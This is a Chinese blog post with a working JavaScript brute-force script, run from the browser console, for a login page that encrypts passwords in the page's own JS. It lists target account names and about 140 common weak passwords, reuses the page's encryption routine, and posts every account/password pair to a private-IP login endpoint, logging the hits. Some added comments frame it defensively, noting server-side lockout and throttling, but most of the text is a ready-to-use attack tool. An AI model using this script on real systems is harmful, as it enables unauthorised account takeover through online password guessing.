
使用js 脚本爆破自定义加密

发表于 2021-12-27 16:17:44
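优势:
1. 网站在前端用 JS 加密密码,脚本直接调用页面自带的 JS 加密函数,省去了分析加密过程
2. 异步速度很快(注:下方代码里设置的是 async : false,请求实际上是逐个同步发送的)
3. 无需部署其它环境,一个浏览器就够了

(从防守角度看,这也说明前端自定义加密挡不住在线口令猜测,登录限速、失败锁定等措施必须在服务端实现。)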

如果网站没有引用 jQuery,需要先引入外部 jQuery(脚本依赖 $.ajax)。

以下为代码部分:
// Target login page (a private RFC 1918 address): http://192.168.1.9:8000/home/Account/LogOn
// Candidate account names.
var uids = [
  "admin", "2311", "7245", "2627", "7243", "6100", "2970", "6939",
  "6549", "6696", "8006", "6733", "8224", "8007", "6132",
];

// The author also kept a single-entry variant: var uids = ["admin"]

// Candidate passwords. The entries are common weak choices (digit runs,
// keyboard walks, "mima"/"woaini" patterns); a server-side password policy
// can use a list like this as a denylist.
var pass = [
  "!QAZ6yhn", "000000", "000000000", "0000000000", "0000000000000000",
  "0123456789", "110120119", "111111", "111111111", "1111111111",
  "1111111111111111", "123.mima", "123123", "123123123", "1233211234567",
  "1234.com", "1234554321", "123456", "123456.", "123456..",
  "123456789", "123456789.", "123456789..", "1234567890", "12345678900",
  "1234567891", "12345678910", "1234567891234567", "1234567899", "123456789a",
  "123456789abc", "123456789q", "123456789qq", "123456a", "123456aa",
  "123456abc", "123456asd", "123456q", "123456qq", "123698745",
  "123abc", "1314520520", "135792468", "1357924680", "147258369",
  "1472583690", "1qaz!QAZ2wsx@WSX", "1qaz#EDC5tgb", "1qaz2wsx!QAZ@WSX", "1qaz@WSX",
  "1qaz@WSX3edc", "1qaz@wsx", "2wsx#EDC", "3edc$RFV", "5201314",
  "5201314520", "52013145201314", "5841314520", "5tgb^YHN", "6yhn&UJM",
  "741852963", "7708801314520", "789456123", "7894561230", "987654321",
  "9876543210", "AAA111...", "Aa111111", "Abc@1234", "Abcd1234",
  "Hello01!", "Hema1111", "MIMA.123", "Qwe123!@#", "Welcome123",
  "Welcome1234", "a123123", "a123456", "a12345678", "a123456789",
  "a5201314", "aa123456", "aa123456789", "aaa123456", "abc123",
  "abc123456", "abc123456789", "abcd123", "abcd1234", "abcd123456",
  "aini1314", "as123456", "asd123", "asd123456", "asdASD123!@#",
  "asdfghjkl", "caonima", "fir2k7st", "mima..123", "mima.123",
  "mima.1234", "mima.321", "mima.456", "mima123.", "nopass.1",
  "nopass.2", "password1!", "q123456", "q123456789", "qaz123456",
  "qazwsxedc", "qazxsw.123", "qq123456", "qq123456789", "qq5201314",
  "qwe123", "qwe123456", "qwe567,.", "qwerty", "qwertyuiop",
  "w123456", "w123456789", "wang123456", "woaini", "woaini123",
  "woaini1314", "woaini1314520", "woaini520", "woaini521", "www123456",
  "z123456", "z123456789", "zxc123", "zxc123.0", "zxc123456",
  "zxcvbnm", "zxcvbnm123",
];

// Login endpoint that receives the POST. Note the scheme is plain http://.
var url = "http://192.168.1.9:8000/home/account/LogOn";

// One request is made per (account, password) pair.
var count = uids.length * pass.length;
console.info(`[i]INFO: 一共需要请求:${count}次\n`);

//请求主体,及表单部分
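/**
 * Send one login attempt for a single account/password pair and log the outcome.
 *
 * The password is transformed with `do_encrypt_slim(getmd5str(pass))` before it
 * is posted. Neither helper is defined in this script; presumably both come from
 * the target page's own JavaScript (confirm against the page). Because the page's
 * own routine is reused as-is, the client-side transform adds no resistance to
 * online guessing: throttling, lockout and MFA have to be enforced server-side.
 *
 * @param {string} url  - Login endpoint that receives the POST.
 * @param {string} uid  - Account name, sent as `usercode`.
 * @param {string} pass - Plaintext candidate; only its transformed form is sent.
 * @returns {void}
 */
function p(url, uid, pass) {
  // Declared locally: the original assigned to an undeclared `enpass`, which
  // leaks a global in sloppy mode and throws a ReferenceError in strict mode.
  const enpass = do_encrypt_slim(getmd5str(pass));

  $.ajax({
    url: url,
    type: "POST",
    // Synchronous request: each call blocks until the server answers.
    async: false,
    data: {
      usercode: uid,
      password: enpass,
      phonecheckword: null,
    },
    success: function (data) {
      // Loose comparison kept on purpose so the treatment of `flag` values
      // other than the boolean false is unchanged.
      if (data.flag != false) {
        console.log(
          `%c[+] login successful!\nLoginid:${uid}\tpassword:${pass}\tusername:\t${data.username}\n`,
          "color: green"
        );
      } else {
        console.warn(`[-] Login failed !\t当前尝试用户:${uid}\t信息:${data.msg}\n`);
      }
    },
    // Author's intent: keep a stalled request from hanging the run.
    // NOTE(review): jQuery is not expected to enforce `timeout` on a
    // synchronous request; confirm before relying on it.
    timeout: 1000,
  });
}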

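// Pair every account name with every candidate password, one request at a
// time: uids.length * pass.length login POSTs in total.
// Loop variables are block-scoped here; the original used undeclared `uint`
// and `i`, which become implicit globals (and throw in strict mode).
// Seen from the server, this is a run of failed logins per account in quick
// succession from one client, the pattern that account lockout and per-client
// throttling on the login endpoint are meant to catch.
for (const uid of uids) {
  for (const candidate of pass) {
    p(url, uid, candidate);
  }
}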


效果图

Fjtr7YsJZ2h_I4edDk1bVsEDJQDu.png